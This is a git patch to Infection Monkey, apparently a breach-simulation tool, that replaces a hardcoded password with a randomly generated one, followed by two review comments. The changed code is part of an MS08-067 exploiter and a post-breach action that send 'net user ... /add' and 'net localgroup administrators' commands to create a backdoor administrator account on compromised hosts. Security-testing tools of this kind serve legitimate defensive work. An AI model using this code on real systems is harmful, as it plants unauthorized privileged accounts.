From 51b996ce1874589f741a78cf25703f4f572cf60b Mon Sep 17 00:00:00 2001
From: Shreya
Date: Mon, 17 May 2021 18:54:45 +0530
Subject: [PATCH] Generate password randomly when creating a new user for Create User PBA and exploit MS08_67 using https://docs.python.org/3.7/library/secrets.html#secrets.token_urlsafe
---
 monkey/infection_monkey/config.py | 1 -
 monkey/infection_monkey/example.conf | 1 -
 monkey/infection_monkey/exploit/win_ms08_067.py | 6 ++++--
 monkey/infection_monkey/post_breach/actions/add_user.py | 6 +++++-
 monkey/infection_monkey/utils/random_password_generator.py | 6 ++++++
 monkey/monkey_island/cc/services/config_schema/internal.py | 6 ------
 6 files changed, 15 insertions(+), 11 deletions(-)
 create mode 100644 monkey/infection_monkey/utils/random_password_generator.py
diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py
index ad37bf837..d00d55814 100644
--- a/monkey/infection_monkey/config.py
+++ b/monkey/infection_monkey/config.py
@@ -192,7 +192,6 @@ class Configuration(object):
 ms08_067_exploit_attempts = 5
 user_to_add = "Monkey_IUSER_SUPPORT"
- remote_user_pass = "Password1!"
 # User and password dictionaries for exploits.
diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf
index b27f2f3cc..774d69aed 100644
--- a/monkey/infection_monkey/example.conf
+++ b/monkey/infection_monkey/example.conf
@@ -61,7 +61,6 @@
 "send_log_to_server": true,
 "ms08_067_exploit_attempts": 5,
 "user_to_add": "Monkey_IUSER_SUPPORT",
- "remote_user_pass": "Password1!",
 "ping_scan_timeout": 10000,
 "smb_download_timeout": 300,
 "smb_service_name": "InfectionMonkey",
diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py
index 16b971cd8..8e6daa8f4 100644
--- a/monkey/infection_monkey/exploit/win_ms08_067.py
+++ b/monkey/infection_monkey/exploit/win_ms08_067.py
@@ -25,6 +25,7 @@ from infection_monkey.exploit.tools.smb_tools import SmbTools
 from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
 from infection_monkey.network.smbfinger import SMBFinger
 from infection_monkey.network.tools import check_tcp_port
+from infection_monkey.utils.random_password_generator import get_random_password
 LOG = getLogger(__name__)
@@ -230,6 +231,7 @@ class Ms08_067_Exploiter(HostExploiter):
 )
 exploited = False
+ remote_user_pwd = get_random_password()
 for _ in range(self._config.ms08_067_exploit_attempts):
 exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr, os_version=os_version)
@@ -240,7 +242,7 @@ class Ms08_067_Exploiter(HostExploiter):
 "cmd /c (net user {} {} /add) &&"
 " (net localgroup administrators {} /add)\r\n".format(
 self._config.user_to_add,
- self._config.remote_user_pass,
+ remote_user_pwd,
 self._config.user_to_add,
 ).encode()
 )
@@ -264,7 +266,7 @@ class Ms08_067_Exploiter(HostExploiter):
 src_path,
 self._config.dropper_target_path_win_32,
 self._config.user_to_add,
- self._config.remote_user_pass,
+ remote_user_pwd,
 )
 if not remote_full_path:
diff --git a/monkey/infection_monkey/post_breach/actions/add_user.py b/monkey/infection_monkey/post_breach/actions/add_user.py
index cae5a2428..7e92eaf84 100644
--- a/monkey/infection_monkey/post_breach/actions/add_user.py
+++ b/monkey/infection_monkey/post_breach/actions/add_user.py
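Review bot: `remote_user_pwd` in `win_ms08_067.py` is now a live credential for an account that the following hunk adds to the local administrators group, and it is formatted directly into that command string and passed on as an argument in the last hunk of the file; nothing visible here shows whether the command bytes or those arguments are logged or reported, so please confirm the value never reaches logs or telemetry. The same question applies to `BackdoorUser.__init__` in `add_user.py`, where the password ends up inside `linux_cmd` and `windows_cmd`. I would also put a comment on the assignment, for example `# Generated once, before the retry loop: the same password creates the account and is reused for the later file copy`, so that nobody moves it inside the loop. The enclosing method starts and ends outside these hunks.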
@@ -1,14 +1,18 @@
 from common.common_consts.post_breach_consts import POST_BREACH_BACKDOOR_USER
 from infection_monkey.config import WormConfiguration
 from infection_monkey.post_breach.pba import PBA
+from infection_monkey.utils.random_password_generator import get_random_password
 from infection_monkey.utils.users import get_commands_to_add_user
 class BackdoorUser(PBA):
 def __init__(self):
+ remote_user_pwd = get_random_password()
+
 linux_cmds, windows_cmds = get_commands_to_add_user(
- WormConfiguration.user_to_add, WormConfiguration.remote_user_pass
+ WormConfiguration.user_to_add, remote_user_pwd
 )
+
 super(BackdoorUser, self).__init__(
 POST_BREACH_BACKDOOR_USER, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds
 )
diff --git a/monkey/infection_monkey/utils/random_password_generator.py b/monkey/infection_monkey/utils/random_password_generator.py
new file mode 100644
index 000000000..d205a9a01
--- /dev/null
+++ b/monkey/infection_monkey/utils/random_password_generator.py
@@ -0,0 +1,6 @@
+import secrets
+
+
+def get_random_password(length: int = 12) -> str:
+ password = secrets.token_urlsafe(length)
+ return password
diff --git a/monkey/monkey_island/cc/services/config_schema/internal.py b/monkey/monkey_island/cc/services/config_schema/internal.py
index c42992d1b..1ce1c864b 100644
--- a/monkey/monkey_island/cc/services/config_schema/internal.py
+++ b/monkey/monkey_island/cc/services/config_schema/internal.py
@@ -397,12 +397,6 @@ INTERNAL = {
 "default": "Monkey_IUSER_SUPPORT",
 "description": "Username to add on successful exploit",
 },
- "remote_user_pass": {
- "title": "Remote user password",
- "type": "string",
- "default": "Password1!",
- "description": "Password to use for created user",
- },
 },
 },
 "sambacry": {
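Review bot: In `random_password_generator.py`, the `length` parameter of `get_random_password` is passed to `secrets.token_urlsafe` as a byte count, not a character count, so the default of 12 returns a 16-character string drawn from letters, digits, `-` and `_`. A caller that asks for a given length because of a limit on the receiving side will get roughly a third more characters than requested. Since the file is new, I would either rename the parameter to `nbytes` or keep the name and state the unit in a docstring such as `"""Return a URL-safe random password built from *length* random bytes (about 1.3 characters per byte)."""`. The temporary `password` variable can also go: `return secrets.token_urlsafe(length)`.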